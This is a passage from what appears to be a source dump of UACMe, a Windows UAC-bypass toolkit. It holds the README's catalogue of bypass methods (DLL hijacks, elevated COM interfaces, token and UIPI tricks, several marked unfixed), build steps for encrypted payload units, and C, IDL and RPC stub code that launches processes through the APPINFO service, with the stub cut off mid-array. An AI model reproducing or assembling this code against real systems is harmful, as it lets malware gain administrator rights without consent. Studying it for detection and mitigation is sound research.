IElevatedFactoryServer\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmVFServerTaskSchedMethod\n * Works from: Windows 8.1 (9600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.6.1\n75. Author: zcgonvh derivative by Wh04m1001\n * Type: Elevated COM interface\n * Method: IDiagnosticProfile\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmVFServerDiagProfileMethod\n * Works from: Windows 7 RTM (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.6.2\n76. Author: HackerHouse\n * Type: Dll Hijack\n * Method: Dll path search abuse, Registry key manipulation\n * Target(s): \\syswow64\\iscsicpl.exe\n * Component(s): iscsiexe.dll\n * Implementation: ucmIscsiCplMethod\n * Works from: Windows 7 RTM (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.6.3\n77. Author: Arush Agarampur\n * Type: Dll Hijack\n * Method: IFileOperation\n * Target(s): \\system32\\mmc.exe\n * Component(s): atl.dll\n * Implementation: ucmAtlHijackMethod\n * Works from: Windows 7 RTM (7600)\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.6.4\n78. Author: antonioCoco\n * Type: Impersonation\n * Method: SSPI Datagram\n * Target(s): Attacker defined\n * Component(s): Attacker defined\n * Implementation: ucmSspiDatagramMethod\n * Works from: Windows 7 RTM (7600)\n * AlwaysNotify compatible\n * Fixed in: Windows 10 (19041), a part of patch, 2024? year\n * How: Side effect of Windows changes\n * Code status: added in v3.6.5\n79. Author: James Forshaw and Stefan Kanthak\n * Type: GUI Hack\n * Method: UIPI bypass with token modification\n * Target(s): \\system32\\osk.exe, \\system32\\mmc.exe\n * Component(s): Attacker defined\n * Implementation: ucmTokenModUIAccessMethod2\n * Works from: Windows 7 (7600)\n * Fixed in: Windows 10 RS5 (17763), a part of patch, 2024 year\n * How: When integrity level of an UIAccess token is lowered, the UIAccess property is removed\n * Code status: added in v3.6.6\n80. Author: R41N3RZUF477\n * Type: Shell API\n * Method: Environment variables expansion, Dll Hijack\n * Target(s): \\system32\\taskhostw.exe\n * Component(s): PerformanceTraceHandler.dll\n * Implementation: ucmRequestTraceMethod\n * Works from: Windows 11 (26100)\n * AlwaysNotify compatible\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.6.7\n81. Author: R41N3RZUF477\n * Type: Shell API\n * Method: Environment variables expansion, Dll Hijack, UIPI bypass\n * Target(s): \\system32\\QuickAssist.exe\n * Component(s): EmbeddedBrowserWebView.dll\n * Implementation: ucmQuickAssistMethod\n * Works from: Windows 10 (19041)\n * AlwaysNotify compatible\n * Fixed in: unfixed :see_no_evil:\n * How: -\n * Code status: added in v3.6.8\n\n \n\n**Important Notes:**\n* Method 30, 63 and later are implemented only in x64 version\n* Method 30 requires x64 because it exploits WOW64 subsystem feature\n* Method 55 is included primarily for educational purposes and may not be reliable\n* Method 78 requires that the current user account password is not blank\n\n## Warning\n\n⚠️ **Important Security and Usage Information**:\n\n* This tool demonstrates **only publicly known UAC bypass methods** used by malware. It reimplements some techniques in different ways to improve upon original concepts.\n* **Not intended for antivirus testing** and not guaranteed to work in environments with aggressive security software. Use with active antivirus at your own risk.\n* Many antivirus solutions may flag this tool as a \"HackTool\" - this is expected behavior due to its capabilities.\n* **Clean up after usage**: If running on a production system, ensure you remove all program artifacts afterward. See source code for details about files dropped to system folders.\n* Most methods were developed primarily for x64 systems. While many can work on x86-32 with minor adjustments, 32-bit support is not a focus of this project.\n* For an official Microsoft explanation on why UAC bypasses still exist, see: [Microsoft's stance on UAC](https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105)\n\n# Windows 10 support and testing policy\n* UACMe is tested only with LSTB/LTSC variants (1607/1809) and the current RTM-1 versions\n* For example: if the current version is 2004, it will be tested on 2004 (19041) and the previous 1909 (18363)\n* Insider builds are not supported as methods may be fixed in preview releases\n\n# Protection Measures\nThe most effective protection against UAC bypass techniques is using an account without administrative privileges.\n\n# Build instructions\n\nUACMe is written in C and requires Microsoft Visual Studio 2019 or later to build from source.\n\n### Prerequisites\n* **IDE**: Microsoft Visual Studio 2019 or 2022\n* **SDK Requirements**:\n * Windows 8.1 or Windows 10 SDK (tested with 19041 version)\n * NET Framework SDK (tested with 4.8 version)\n\n### Build Steps\n\n1. **Configure Platform ToolSet** (Project->Properties->General):\n * For Visual Studio 2019: Select v142\n * For Visual Studio 2022: Select v143\n\n2. **Set Target Platform Version** (Project->Properties->General):\n * For v140: Select 8.1 (Windows 8.1 SDK must be installed)\n * For v141 and above: Select 10\n\n3. **Build Process**:\n * Compile payload units\n * Compile Naka module\n * Encrypt all payload units using Naka module\n * Generate secret blobs for these units using Naka module\n * Move compiled units and secret blobs to the Akagi\\Bin directory\n * Rebuild Akagi\n\n> **Note**: Compiled binaries are not provided and will never be provided. This serves as a barrier against malicious usage and helps maintain the educational purpose of this project.\n\n## Legal Disclaimer\n\n* This tool is provided for **educational and research purposes only**\n* We do not take any responsibility for this tool being used in malicious activities\n* We have no affiliation with any \"security company\" using this code for commercial activities\n* This GitHub repository (hfiref0x/UACME) is the only genuine source for UACMe code\n\n# Support\n\nIf you find this project interesting, you can buy me a coffee\n\nBTC (Bitcoin): bc1qzkvtpa0053cagf35dqmpvv9k8hyrwl7krwdz84q39mcpy68y6tmqsju0g4\n \n# References\n\n* Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html\n* Malicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf\n* Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/\n* Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog\n* KernelMode.Info UACMe thread, https://www.kernelmode.info/forum/viewtopicf985.html?f=11&t=3643\n* Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited\n* \"Fileless\" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n* Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n* Using IARPUninstallStringLauncher COM interface to bypass UAC, http://www.freebuf.com/articles/system/116611.html\n* Bypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/\n* \"Fileless\" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n* UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/\n* Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html\n* First entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n* Reading Your Way Around UAC in 3 parts:\n 1. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html\n 2. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html\n 3. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html \n* Research on CMSTP.exe, https://msitpros.com/?p=3960\n* UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.html\n* UAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n* Yet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\n* UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/\n* Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html\n* Fileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html\n* Calling Local Windows RPC Servers from .NET, https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html\n* Microsoft Windows 10 UAC bypass local privilege escalation exploit, https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html\n* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html\n* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html\n* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses\n* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass\n* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944\n* Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html\n* Bypassing UAC with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html\n* Mitigate some Exploits for Windows’® UAC, https://skanthak.hier-im-netz.de/uacamole.html\n\n# Authors\n\n(c) 2014 - 2026 UACMe Project\n"
},
{
"path": "Source/Akagi/aic.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2026\n*\n* TITLE: AIC.C\n*\n* VERSION: 3.69\n*\n* DATE: 12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n#ifdef _WIN64\n#include \"appinfo/x64/appinfo64.h\"\n#else\n#include \"appinfo/x86-32/appinfo32.h\"\n#endif\n\n/*\n* AicpAsyncInitializeHandle\n*\n* Purpose:\n*\n* Init RPC_ASYNC_STATE structure.\n*\n*/\nRPC_STATUS AicpAsyncInitializeHandle(\n _Inout_ RPC_ASYNC_STATE* AsyncState)\n{\n RPC_STATUS status;\n\n status = RpcAsyncInitializeHandle(AsyncState, sizeof(RPC_ASYNC_STATE));\n if (status == RPC_S_OK) {\n AsyncState->NotificationType = RpcNotificationTypeEvent;\n AsyncState->u.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);\n if (AsyncState->u.hEvent == NULL)\n status = GetLastError();\n }\n\n return status;\n}\n\n/*\n* AicpAsyncCloseHandle\n*\n* Purpose:\n*\n* Close RPC_ASYNC_STATE notification event.\n*\n*/\nVOID AicpAsyncCloseHandle(\n _Inout_ RPC_ASYNC_STATE* AsyncState)\n{\n if (AsyncState->u.hEvent) {\n CloseHandle(AsyncState->u.hEvent);\n AsyncState->u.hEvent = NULL;\n }\n}\n\n/*\n* AicLaunchAdminProcess\n*\n* Purpose:\n*\n* Create process by talking to APPINFO via RPC.\n*\n*/\nBOOLEAN AicLaunchAdminProcess(\n _In_opt_ LPWSTR ExecutablePath,\n _In_opt_ LPWSTR CommandLine,\n _In_ DWORD StartFlags,\n _In_ DWORD CreationFlags,\n _In_ LPWSTR CurrentDirectory,\n _In_ LPWSTR WindowStation,\n _In_opt_ HWND hWnd,\n _In_ DWORD Timeout,\n _In_ DWORD ShowFlags,\n _Out_ PROCESS_INFORMATION* ProcessInformation\n)\n{\n BOOLEAN bResult = FALSE;\n RPC_BINDING_HANDLE rpcHandle;\n RPC_ASYNC_STATE asyncState;\n APP_PROCESS_INFORMATION procInfo;\n APP_STARTUP_INFO appStartup;\n RPC_STATUS status;\n VOID* Reply = NULL;\n\n LONG elevationType = 0;\n\n if (ProcessInformation) {\n ProcessInformation->hProcess = NULL;\n ProcessInformation->hThread = NULL;\n ProcessInformation->dwProcessId = 0;\n ProcessInformation->dwThreadId = 0;\n }\n\n RtlSecureZeroMemory(&procInfo, sizeof(procInfo));\n RtlSecureZeroMemory(&appStartup, sizeof(appStartup));\n\n appStartup.dwFlags = STARTF_USESHOWWINDOW;\n appStartup.wShowWindow = (SHORT)ShowFlags;\n\n RtlSecureZeroMemory(&asyncState, sizeof(RPC_ASYNC_STATE));\n\n if ((supCreateBindingHandle(APPINFO_RPC, &rpcHandle) == RPC_S_OK) &&\n (AicpAsyncInitializeHandle(&asyncState) == RPC_S_OK))\n {\n\n __try {\n\n RAiLaunchAdminProcess(&asyncState,\n rpcHandle,\n ExecutablePath,\n CommandLine,\n StartFlags,\n CreationFlags,\n CurrentDirectory,\n WindowStation,\n &appStartup,\n (ULONG_PTR)hWnd,\n Timeout,\n &procInfo,\n &elevationType);\n\n if (WaitForSingleObject(asyncState.u.hEvent, INFINITE) == WAIT_FAILED)\n {\n RpcRaiseException(-1);\n }\n\n status = RpcAsyncCompleteCall(&asyncState, &Reply);\n if (status == 0 && Reply == NULL) {\n\n if (ProcessInformation) {\n ProcessInformation->hProcess = (HANDLE)procInfo.ProcessHandle;\n ProcessInformation->hThread = (HANDLE)procInfo.ThreadHandle;\n ProcessInformation->dwProcessId = (DWORD)procInfo.ProcessId;\n ProcessInformation->dwThreadId = (DWORD)procInfo.ThreadId;\n }\n\n bResult = TRUE;\n\n }\n\n AicpAsyncCloseHandle(&asyncState);\n\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n AicpAsyncCloseHandle(&asyncState);\n RpcBindingFree(&rpcHandle);\n SetLastError(RpcExceptionCode());\n return FALSE;\n }\n\n RpcBindingFree(&rpcHandle);\n }\n\n return bResult;\n}\n"
},
{
"path": "Source/Akagi/aic.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2020\n*\n* TITLE: AIC.H\n*\n* VERSION: 3.23\n*\n* DATE: 17 Dec 2019\n*\n* Common header file for the AppInfo routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef ULONG ELEVATION_REASON;\n\nBOOLEAN AicLaunchAdminProcess(\n _In_opt_ LPWSTR ExecutablePath,\n _In_opt_ LPWSTR CommandLine,\n _In_ DWORD StartFlags,\n _In_ DWORD CreationFlags,\n _In_ LPWSTR CurrentDirectory,\n _In_ LPWSTR WindowStation,\n _In_opt_ HWND hWnd,\n _In_ DWORD Timeout,\n _In_ DWORD ShowFlags,\n _Out_ PROCESS_INFORMATION* ProcessInformation);\n"
},
{
"path": "Source/Akagi/akagi.manifest",
"content": "\n\n \n Akagi was an aircraft carrier of the Imperial Japanese Navy (IJN), named after Mount Akagi in present-day Gunma Prefecture.\n \n \n \n \t\n \n \n \n \n \n \n \n \n\n"
},
{
"path": "Source/Akagi/appinfo/appinfo.acf",
"content": "interface LaunchAdminProcess\n{\t\n\t[async] RAiLaunchAdminProcess();\n}"
},
{
"path": "Source/Akagi/appinfo/appinfo.idl",
"content": "import \"oaidl.idl\";\nimport \"ocidl.idl\";\n\n[\nuuid(201ef99a-7fa0-444c-9399-19ba84f12a1a),\nversion(1.0),\n]\ninterface LaunchAdminProcess\n{\n\n\ttypedef struct _MONITOR_POINT {\n\t\tlong MonitorLeft;\n\t\tlong MonitorRight;\n\t} MONITOR_POINT;\n\n\ttypedef struct _APP_STARTUP_INFO {\n\t\twchar_t* lpszTitle;\n\t\tlong dwX;\n\t\tlong dwY;\n\t\tlong dwXSize;\n\t\tlong dwYSize;\n\t\tlong dwXCountChars;\n\t\tlong dwYCountChars;\n\t\tlong dwFillAttribute;\n\t\tlong dwFlags;\n\t\tshort wShowWindow;\n\t\tstruct _MONITOR_POINT MonitorPoint;\n\t} APP_STARTUP_INFO;\n\n\ttypedef struct _APP_PROCESS_INFORMATION {\n\t\tunsigned __int3264 ProcessHandle;\n\t\tunsigned __int3264 ThreadHandle;\n\t\tlong ProcessId;\n\t\tlong ThreadId;\n\t} APP_PROCESS_INFORMATION;\n\n\tlong RAiLaunchAdminProcess(\n\t\thandle_t hBinding,\n\t\t[in][unique][string] wchar_t* ExecutablePath,\n\t\t[in][unique][string] wchar_t* CommandLine,\n\t\t[in]long StartFlags,\n\t\t[in]long CreationFlags,\n\t\t[in][string] wchar_t* CurrentDirectory,\n\t\t[in][string] wchar_t* WindowStation,\n\t\t[in]struct _APP_STARTUP_INFO* StartupInfo,\n\t\t[in]unsigned __int3264 hWnd,\n\t\t[in]long Timeout,\n\t\t[out]struct _APP_PROCESS_INFORMATION* ProcessInformation,\n\t\t[out]long* ElevationType);\n\n}"
},
{
"path": "Source/Akagi/appinfo/x64/appinfo64.c",
"content": "\n\n/* this ALWAYS GENERATED file contains the RPC client stubs */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#if defined(_M_AMD64)\n\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 ) /* redefine extern to static */\n#pragma warning( disable: 4232 ) /* dllimport identity*/\n#pragma warning( disable: 4024 ) /* array to pointer mapping*/\n\n#include \"appinfo64.h\"\n\n#define TYPE_FORMAT_STRING_SIZE 75 \n#define PROC_FORMAT_STRING_SIZE 103 \n#define EXPR_FORMAT_STRING_SIZE 1 \n#define TRANSMIT_AS_TABLE_SIZE 0 \n#define WIRE_MARSHAL_TABLE_SIZE 0 \n\ntypedef struct _appinfo_MIDL_TYPE_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];\n } appinfo_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_PROC_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ PROC_FORMAT_STRING_SIZE ];\n } appinfo_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_EXPR_FORMAT_STRING\n {\n long Pad;\n unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];\n } appinfo_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\n\nextern const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString;\nextern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString;\nextern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE 0 \n\n\n/* Standard interface: LaunchAdminProcess, ver. 1.0,\n GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface =\n {\n sizeof(RPC_CLIENT_INTERFACE),\n {{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}},\n {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n 0,\n 0,\n 0,\n 0,\n 0,\n 0x00000000\n };\nRPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface;\n\nextern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc;\n\nstatic RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle;\n\n\n/* [async] */ void RAiLaunchAdminProcess( \n /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n handle_t hBinding,\n /* [string][unique][in] */ wchar_t *ExecutablePath,\n /* [string][unique][in] */ wchar_t *CommandLine,\n /* [in] */ long StartFlags,\n /* [in] */ long CreationFlags,\n /* [string][in] */ wchar_t *CurrentDirectory,\n /* [string][in] */ wchar_t *WindowStation,\n /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n /* [in] */ unsigned __int3264 hWnd,\n /* [in] */ long Timeout,\n /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n /* [out] */ long *ElevationType)\n{\n\n NdrAsyncClientCall(\n ( PMIDL_STUB_DESC )&LaunchAdminProcess_StubDesc,\n (PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0],\n RAiLaunchAdminProcess_AsyncHandle,\n hBinding,\n ExecutablePath,\n CommandLine,\n StartFlags,\n CreationFlags,\n CurrentDirectory,\n WindowStation,\n StartupInfo,\n hWnd,\n Timeout,\n ProcessInformation,\n ElevationType);\n \n}\n\n\n#if !defined(__RPC_WIN64__)\n#error Invalid build platform for this stub.\n#endif\n\nstatic const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString =\n {\n 0,\n {\n\n\t/* Procedure RAiLaunchAdminProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags: */\n/* 2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/* 6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 8 */\tNdrFcShort( 0x70 ),\t/* X64 Stack size/offset = 112 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\n/* 14 */\tNdrFcShort( 0x20 ),\t/* 32 */\n/* 16 */\tNdrFcShort( 0x24 ),\t/* 36 */\n/* 18 */\t0xc7,\t\t/* Oi2 Flags: srv must size, clt must size, has return, has ext, has async handle */\n\t\t\t0xc,\t\t/* 12 */\n/* 20 */\t0xa,\t\t/* 10 */\n\t\t\t0x1,\t\t/* Ext Flags: new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter ExecutablePath */\n\n/* 30 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 32 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\n/* 34 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter CommandLine */\n\n/* 36 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 38 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\n/* 40 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter StartFlags */\n\n/* 42 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 44 */\tNdrFcShort( 0x20 ),\t/* X64 Stack size/offset = 32 */\n/* 46 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter CreationFlags */\n\n/* 48 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 50 */\tNdrFcShort( 0x28 ),\t/* X64 Stack size/offset = 40 */\n/* 52 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter CurrentDirectory */\n\n/* 54 */\tNdrFcShort( 0x10b ),\t/* Flags: must size, must free, in, simple ref, */\n/* 56 */\tNdrFcShort( 0x30 ),\t/* X64 Stack size/offset = 48 */\n/* 58 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter WindowStation */\n\n/* 60 */\tNdrFcShort( 0x10b ),\t/* Flags: must size, must free, in, simple ref, */\n/* 62 */\tNdrFcShort( 0x38 ),\t/* X64 Stack size/offset = 56 */\n/* 64 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter StartupInfo */\n\n/* 66 */\tNdrFcShort( 0x10b ),\t/* Flags: must size, must free, in, simple ref, */\n/* 68 */\tNdrFcShort( 0x40 ),\t/* X64 Stack size/offset = 64 */\n/* 70 */\tNdrFcShort( 0x16 ),\t/* Type Offset=22 */\n\n\t/* Parameter hWnd */\n\n/* 72 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 74 */\tNdrFcShort( 0x48 ),\t/* X64 Stack size/offset = 72 */\n/* 76 */\t0xb9,\t\t/* FC_UINT3264 */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter Timeout */\n\n/* 78 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 80 */\tNdrFcShort( 0x50 ),\t/* X64 Stack size/offset = 80 */\n/* 82 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter ProcessInformation */\n\n/* 84 */\tNdrFcShort( 0x6113 ),\t/* Flags: must size, must free, out, simple ref, srv alloc size=24 */\n/* 86 */\tNdrFcShort( 0x58 ),\t/* X64 Stack size/offset = 88 */\n/* 88 */\tNdrFcShort( 0x38 ),\t/* Type Offset=56 */\n\n\t/* Parameter ElevationType */\n\n/* 90 */\tNdrFcShort( 0x2150 ),\t/* Flags: out, base type, simple ref, srv alloc size=8 */\n/* 92 */\tNdrFcShort( 0x60 ),\t/* X64 Stack size/offset = 96 */\n/* 94 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 96 */\tNdrFcShort( 0x70 ),\t/* Flags: out, return, base type, */\n/* 98 */\tNdrFcShort( 0x68 ),\t/* X64 Stack size/offset = 104 */\n/* 100 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n }\n };\n\nstatic const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString =\n {\n 0,\n {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 6 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/* 8 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 10 */\t\n\t\t\t0x11, 0x0,\t/* FC_RP */\n/* 12 */\tNdrFcShort( 0xa ),\t/* Offset= 10 (22) */\n/* 14 */\t\n\t\t\t0x15,\t\t/* FC_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 20 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 22 */\t\n\t\t\t0x1a,\t\t/* FC_BOGUS_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 24 */\tNdrFcShort( 0x38 ),\t/* 56 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x14 ),\t/* Offset= 20 (48) */\n/* 30 */\t0x36,\t\t/* FC_POINTER */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 32 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 34 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 36 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x8,\t\t/* FC_LONG */\n/* 38 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x6,\t\t/* FC_SHORT */\n/* 40 */\t0x3e,\t\t/* FC_STRUCTPAD2 */\n\t\t\t0x4c,\t\t/* FC_EMBEDDED_COMPLEX */\n/* 42 */\t0x0,\t\t/* 0 */\n\t\t\tNdrFcShort( 0xffe3 ),\t/* Offset= -29 (14) */\n\t\t\t0x40,\t\t/* FC_STRUCTPAD4 */\n/* 46 */\t0x5c,\t\t/* FC_PAD */\n\t\t\t0x5b,\t\t/* FC_END */\n/* 48 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 50 */\t0x5,\t\t/* FC_WCHAR */\n\t\t\t0x5c,\t\t/* FC_PAD */\n/* 52 */\t\n\t\t\t0x11, 0x4,\t/* FC_RP [alloced_on_stack] */\n/* 54 */\tNdrFcShort( 0x2 ),\t/* Offset= 2 (56) */\n/* 56 */\t\n\t\t\t0x1a,\t\t/* FC_BOGUS_STRUCT */\n\t\t\t0x3,\t\t/* 3 */\n/* 58 */\tNdrFcShort( 0x18 